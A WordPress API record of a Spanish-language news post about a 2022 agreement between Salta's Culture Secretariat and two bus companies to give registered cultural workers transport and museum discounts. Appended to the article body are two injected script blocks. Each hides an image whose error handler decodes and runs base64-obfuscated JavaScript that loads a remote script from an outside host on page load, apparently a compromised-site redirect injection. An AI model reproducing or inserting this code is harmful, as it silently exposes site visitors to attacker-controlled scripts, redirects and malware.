{"id":1349,"date":"2022-08-23T17:17:35","date_gmt":"2022-08-23T20:17:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1349"},"modified":"2025-08-14T00:37:44","modified_gmt":"2025-08-14T03:37:44","slug":"convenio-entre-cultura-y-empresas-de-transporte-de-mediana-y-larga-distancia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1349","title":{"rendered":"Convenio entre Cultura y empresas de transporte de mediana y larga distancia"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#9b0d30\">Este viernes, en la Usina Cultural se realizar\u00e1 la firma de un Convenio de Colaboraci\u00f3n Rec\u00edproca que permitir\u00e1 el traslado de personal cultural empadronado. .<\/h4>\n\n\n\n<p>Este viernes 26, a las 9,&nbsp;se realizar\u00e1 la firma de un convenio de colaboraci\u00f3n entre la Secretar\u00eda de Cultura y las empresas de transporte La Veloz del Norte S.A. y Derudder Hnos. S.R.L. El objetivo es fortalecer la cooperaci\u00f3n del sector privado en todos los \u00e1mbitos relacionados con la gesti\u00f3n cultural, poniendo en marcha acciones conjuntas&nbsp;que redunden en beneficio de los organismos comprometidos.<\/p>\n\n\n\n<p>Espec\u00edficamente se pretende lograr la prestaci\u00f3n de servicios de transporte de mediana y larga distancia de La Veloz del Norte y Flecha Bus al personal cultural empadronado en el Registro Provincial \u00danico, Ganadores del Sal\u00f3n de Artes Visuales, Concurso Literario Provincial y beneficiarios del Fondo Ciudadano de Desarrollo Cultural. En simult\u00e1neo, La Secretar\u00eda de Cultura, a trav\u00e9s de sus distintas instituciones como el Museo de Alta Monta\u00f1a, Museo de la Vid y el Vino, Museo G\u00fcemes, Complejo Museol\u00f3gico y Cultural \u201cExplora Salta\u201d se compromete a otorgar entradas e importantes descuentos para el ingreso a dichas instituciones y\/o funciones organizadas por dichas instituciones, tanto para los empleados como para los pasajeros de las empresas involucradas.<\/p>\n\n\n\n<p>Para el cumplimiento de las prestaciones convenidas, los aspirantes al beneficio deber\u00e1n estar inscriptos en los diferentes registros de trabajadores de la Cultura que se encuentran articulados por el sitio web www.culturasalta.gov.ar.<\/p>\n\n\n\n<p>El presente convenio tendr\u00e1 una vigencia de doce meses a partir de la firma del mismo y comprende 24 recorridos que conectan Salta con Buenos Aires, C\u00f3rdoba, Jujuy, Formosa y Tucum\u00e1n.<\/p>\n\n\n\n<p>Las empresas que brindar\u00e1n el servicio son La Veloz del Norte y Flecha Bus, los recorridos comprendidos son Salta \u2013 Tucum\u00e1n, Salta \u2013 Jujuy, Tucum\u00e1n \u2013 Or\u00e1n, Tucum\u00e1n &#8211; Salvador Mazza, Salta &#8211; Salvador Mazza, Salta &#8211; Aguas Blancas, Salta &#8211; Buenos Aires, Salta \u2013 C\u00f3rdoba, Jujuy \u2013 C\u00f3rdoba, Jujuy \u2013 Buenos Aires, La Quiaca &#8211; Buenos Aires, Salvador Mazza &#8211; Buenos Aires, Salvador Mazza \u2013 C\u00f3rdoba, Salta \u2013 Corrientes, Salta &#8211; Rosario de la Frontera, Salta &#8211; Apolinario Saravia, Salta &#8211; El Sauce, Salta &#8211; El Quebrachal, Metan &#8211; Apolinario Saravia, Oran &#8211; El Quebrachal, Apolinario Saravia &#8211; Joaqu\u00edn V Gonz\u00e1lez, Rosario de la Frontera &#8211; El Tala, Formosa, Cafayate.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este viernes, en la Usina Cultural se realizar\u00e1 la firma de un Convenio de Colaboraci\u00f3n Rec\u00edproca que permitir\u00e1 el traslado de personal cultural empadronado. . Este viernes 26, a las 9,&nbsp;se realizar\u00e1 la firma de un convenio de colaboraci\u00f3n entre la Secretar\u00eda de Cultura y las empresas de transporte La Veloz del Norte S.A. y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1350,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-1349","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1349"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1349"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1349\/revisions"}],"predecessor-version":[{"id":7383,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1349\/revisions\/7383"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1350"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}